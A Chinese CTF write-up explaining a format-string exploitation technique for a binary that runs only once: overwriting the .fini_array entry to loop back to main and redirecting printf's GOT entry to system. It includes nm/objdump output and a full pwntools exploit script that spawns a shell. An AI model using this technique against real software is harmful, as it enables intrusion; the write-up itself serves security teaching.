Fmtstr_Loop

一阵风我拿起笔 一场雨我想起你
这一路的风和雨 仍然找不回自己

前言

很多时候都是因为程序中存在循环,如果程序中不存在循环呢?在一些栈溢出中我们可以使用ROP技术劫持函数返回地址到start,同样我们可以使用格式化字符串漏洞做到这一点….

实例

题目:链接

思路

虽然我们写代码的时候以main函数作为程序入口,但是编译成程序的时候入口并不是main函数,而是start代码段。事实上,start代码段还会调用__libc_start_main来做一些初始化工作,最后调用main函数并在main函数结束后做一些处理;
所以我们可以修改fini段来修改程序的执行流程….

这道题就是一个标准的格式化字符串漏洞,并且程序只可以执行一次:

1
2
3
4
sir@sir-PC:~/desktop/2$ ./pwn
Welcome to my ctf! What's your name?
aaaa,%x,%x,%x,%x,%x
Hello aaaa,ff82d830,2,0,61616161,252c7825

这道题我们的思路就是修改fini段,让程序可以执行多次,然后把printf_got的位置换为system_plt,当程序执行printf(“/bin/sh;”)就去执行system(“/bin/sh;”)了;

找要修改的fini的位置:

1
2
3
4
sir@sir-PC:~/desktop/2$ nm pwn | grep fini
0804979c t __do_global_dtors_aux_fini_array_entry
08048624 T _fini
08048620 T __libc_csu_fini

我们只要把0x0804979c这个位置的内容改为main函数的地址,程序在结束的时候就会执行main函数了;

1
2
3
sir@sir-PC:~/desktop/2$ nm pwn | grep main
U __libc_start_main@@GLIBC_2.0
08048534 T main

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
sir@sir-PC:~/desktop/2$ objdump -R pwn

pwn: 文件格式 elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
0804988c R_386_GLOB_DAT __gmon_start__
080498c0 R_386_COPY stdin@@GLIBC_2.0
080498c4 R_386_COPY stdout@@GLIBC_2.0
0804989c R_386_JUMP_SLOT printf@GLIBC_2.0
080498a0 R_386_JUMP_SLOT puts@GLIBC_2.0
080498a4 R_386_JUMP_SLOT system@GLIBC_2.0
080498a8 R_386_JUMP_SLOT __libc_start_main@GLIBC_2.0
080498ac R_386_JUMP_SLOT setvbuf@GLIBC_2.0
080498b0 R_386_JUMP_SLOT __isoc99_scanf@GLIBC_2.7

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './2/pwn'
p = process(name)

if args.G:
gdb.attach(p)

main_addr = 0x8048534
fini_addr = 0x804979c
system_plt_addr = 0x80483d0
printf_got_addr = 0x804989c
# 第一次执行程序
p.recvuntil("Welcome to my ctf! What's your name?\n")
pay = p32(0x804979c) + p32(0x804979c+2) + p32(0x804989c) + p32(0x804989c+2) + '%34084c%4$hn' + '%33488c%5$hn' + '%31692c%6$hn' + '%33844c%7$hn'
p.sendline(pay)
# 第二次执行程序
p.recvuntil("Welcome to my ctf! What's your name?\n")
p.sendline('/bin/sh;')
p.interactive()
文章目录
  1. 1. 前言
  2. 2. 实例
    1. 2.1. 思路
  3. 3. EXP
,